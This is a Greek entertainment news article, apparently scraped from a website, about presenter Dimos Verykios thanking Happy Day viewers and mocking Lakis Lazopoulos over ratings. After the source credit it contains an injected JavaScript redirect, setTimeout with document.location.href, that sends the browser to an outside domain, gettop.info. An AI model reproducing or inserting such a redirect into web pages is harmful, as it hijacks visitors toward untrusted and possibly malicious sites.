Το «μήνυμα» Βερύκιου στους τηλεθεατές για Λαζόπουλο: Δεν μας προδώσατε… (BINTEO)

0
6

 

Ο Δήμος Βερύκιος σε νέα καυστική του παρέμβαση μέσα από την εκπομπή Happy Day, «κούνησε» στον Λάκη Λαζόπουλο το μαντήλι του αποχαιρετισμού.

Αρχικά ο γνωστός δημοσιογράφος ανέπτυξε καυστικό λόγο στον οποίο δεν κατονόμασε, αλλά ουσιαστικά φωτογράφισε τον ηθοποιό, με αφορμή τα σενάρια περί αποχώρησης του από τον Alpha.

Ιδίως τα όσα ανέφερε στην εκπομπή του Γιώργου Παπαδάκη, ο Λάκης Λαζόπουλος, και τα νούμερα τηλεθέασης που σημείωσαν οι «αντίπαλες» εκπομπές. Την ώρα που ο ηθοποιός ήταν στον αέρα του Καλημέρα Ελλάδα, μετά τις 9, ο ΑΝΤ1 σημείωνε στο δυναμικό κοινό ποσοστό 21,7%. Απέναντι, η ζωντανή σύνδεση του Δήμου Βερύκιου στο Happy Day κρατούσε στον Alpha το 22,7% των τηλεθεατών.

Ο δημοσιογράφος του Alpha, ανέφερε χαρακτηριστικά:

Θέλω να ευχαριστήσω τους φίλους μας, ειδικά σήμερα, διότι παραμένετε πιστοί κάθε μέρα στο πρωινό μας ραντεβού. Είστε συνεπείς στην καθαρότητα του λόγου μας, δεν θέλε φτιασιδώματα, φρουφρού και αρώματα. Ειδικά η χθεσινή μέρα ήταν γράδο για μένα, ήταν τσεκ στο ραντεβού μας, ήταν ένα πραγματικό χτυποκάρδι -έτσι το ένιωσα. Όπως εκείνο το χτυποκάρδι του έφηβου στο πρώτο ραντεβού που υπάρχει ο φόβος του άγνωστου, του μη τυχόν και προδοθεί, μη τυχόν και αποτύχει η σχέση. Και εσείς αποδείξατε χτες, ειδικά χτες, ότι δεν μας προδώσατε.

Είσαστε εδώ μαζί μας, όπως μείνατε μαζί μας και τις 60 μέρες του τηλεοπτικού πολέμου. Όπως μένετε μαζί μας τα τελευταία τρία χρόνια. Μα και χθες δεν λιποτακτήσατε, δεν μας αφήσατε για να πάτε με τους ευκαιριακούς, για να πάτε με τους μισθοφόρους!

Για να συναντηθείτε στη γωνιά έστω και κλεφτά, έστω και φευγαλέα με την αμαρτία. Γι’ αυτό σας υπόσχομαι ότι θα πάρω κουράγιο, θα δουλεύω περισσότερο, θα πηγαίνω όχι στο 21 αλλά και στο 69 για πάρτι σας! Είμαστε οι πρώτοι μάγκες της πρωινής παρέας γιατί έχουμε μια σχέση ερωτική μαζί σας! Και γιατί στον έρωτα αυτό δεν παίρνουμε γρόσια!

Πηγή: zappit.gr setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here